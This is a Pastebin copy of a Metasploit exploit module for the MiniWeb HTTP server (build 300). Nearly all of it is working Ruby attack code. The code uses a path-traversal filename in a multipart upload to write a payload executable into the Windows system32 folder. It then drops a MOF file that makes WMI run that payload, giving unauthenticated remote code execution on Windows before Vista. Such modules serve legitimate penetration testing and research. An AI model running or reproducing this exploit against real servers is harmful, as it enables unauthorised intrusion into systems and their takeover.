Advertisement
FeRR4L

MiniWeb (Build 300) Arbitrary File Upload (metasploit)

Aug 19th, 2013
102
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.69 KB | None | 0 0
  1. MiniWeb (Build 300) Arbitrary File Upload
  2. (metasploit)
  3.  
  4. ##
  5. # This file is part of the Metasploit Framework and may be subject to
  6. # redistribution and commercial restrictions. Please see the Metasploit
  7. # Framework web site for more information on licensing and terms of use.
  8. # http://metasploit.com/framework/
  9. ##
  10.  
  11. require 'msf/core'
  12.  
  13. class Metasploit3 < Msf::Exploit::Remote
  14. Rank = ExcellentRanking
  15.  
  16. HttpFingerprint = { :pattern => [ /MiniWeb/ ] }
  17.  
  18. include Msf::Exploit::Remote::HttpClient
  19. include Msf::Exploit::EXE
  20. include Msf::Exploit::WbemExec
  21. include Msf::Exploit::FileDropper
  22.  
  23. def initialize(info={})
  24. super(update_info(info,
  25. 'Name' => "MiniWeb (Build 300) Arbitrary File Upload",
  26. 'Description' => %q{
  27. This module exploits a vulnerability in MiniWeb HTTP server (build 300).
  28. The software contains a file upload vulnerability that allows an
  29. unauthenticated remote attacker to write arbitrary files to the file system.
  30.  
  31. Code execution can be achieved by first uploading the payload to the remote
  32. machine as an exe file, and then upload another mof file, which enables
  33. WMI (Management Instrumentation service) to execute the uploaded payload.
  34. Please note that this module currently only works for Windows before Vista.
  35. },
  36. 'License' => MSF_LICENSE,
  37. 'Author' =>
  38. [
  39. 'AkaStep', # Initial discovery
  40. 'Brendan Coles <bcoles[at]gmail.com>', # Metasploit
  41. ],
  42. 'References' =>
  43. [
  44. ['OSVDB', '92198'],
  45. ['OSVDB', '92200'],
  46. ['URL', 'http://dl.packetstormsecurity.net/1304-exploits/miniweb-shelltraversal.txt']
  47. ],
  48. 'Payload' =>
  49. {
  50. 'BadChars' => "\x00",
  51. },
  52. 'Platform' => 'win',
  53. 'Targets' =>
  54. [
  55. # Tested on MiniWeb build 300, built on Feb 28 2013
  56. # - Windows XP SP3 (EN)
  57. ['MiniWeb build 300 on Windows (Before Vista)', {}]
  58. ],
  59. 'Privileged' => true,
  60. 'DisclosureDate' => "Apr 9 2013",
  61. 'DefaultTarget' => 0))
  62.  
  63. register_options([
  64. Opt::RPORT(8000),
  65. OptInt.new('DEPTH', [true, 'Traversal depth', 10])
  66. ], self.class)
  67.  
  68. end
  69.  
  70. def peer
  71. "#{rhost}:#{rport}"
  72. end
  73.  
  74. def check
  75.  
  76. begin
  77. uri = normalize_uri(target_uri.path.to_s, "#{rand_text_alpha(rand(10)+5)}")
  78. res = send_request_cgi({
  79. 'method' => 'GET',
  80. 'uri' => uri
  81. })
  82. rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
  83. fail_with(Exploit::Failure::Unreachable, "#{peer} - Connection failed")
  84. end
  85.  
  86. if !res or res.headers['Server'].empty?
  87. return Exploit::CheckCode::Unknown
  88. elsif res.headers['Server'] =~ /^MiniWeb$/
  89. return Exploit::CheckCode::Detected
  90. end
  91.  
  92. return Exploit::CheckCode::Unknown
  93.  
  94. end
  95.  
  96. def upload(filename, filedata)
  97.  
  98. print_status("#{peer} - Trying to upload '#{::File.basename(filename)}'")
  99. uri = normalize_uri(target_uri.path.to_s, "#{rand_text_alpha(rand(10)+5)}")
  100. depth = "../" * (datastore['DEPTH'] + rand(10))
  101.  
  102. boundary = "----WebKitFormBoundary#{rand_text_alphanumeric(10)}"
  103. post_data = "--#{boundary}\r\n"
  104. post_data << "Content-Disposition: form-data; name=\"file\"; filename=\"#{depth}#{filename}\"\r\n"
  105. post_data << "Content-Type: application/octet-stream\r\n"
  106. post_data << "\r\n#{filedata}\r\n"
  107. post_data << "--#{boundary}\r\n"
  108.  
  109. begin
  110. res = send_request_cgi({
  111. 'method' => 'POST',
  112. 'uri' => uri,
  113. 'ctype' => "multipart/form-data; boundary=#{boundary}",
  114. 'data' => post_data
  115. })
  116. rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
  117. fail_with(Exploit::Failure::Unreachable, "#{peer} - Connection failed")
  118. end
  119.  
  120. return res
  121.  
  122. end
  123.  
  124. def exploit
  125. fname = "#{rand_text_alpha(rand(10)+5)}"
  126.  
  127. # upload exe
  128. exe_name = "WINDOWS/system32/#{fname}.exe"
  129. exe = generate_payload_exe
  130. print_status("#{peer} - Sending executable (#{exe.length.to_s} bytes)")
  131. upload(exe_name, exe)
  132.  
  133. # upload mof
  134. mof_name = "WINDOWS/system32/wbem/mof/#{fname}.mof"
  135. mof = generate_mof(::File.basename(mof_name), ::File.basename(exe_name))
  136. print_status("#{peer} - Sending MOF (#{mof.length.to_s} bytes)")
  137. upload(mof_name, mof)
  138.  
  139. # list files to clean up
  140. register_file_for_cleanup("#{::File.basename(exe_name)}")
  141. register_file_for_cleanup("wbem\\mof\\good\\#{::File.basename(mof_name)}")
  142. end
  143.  
  144. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement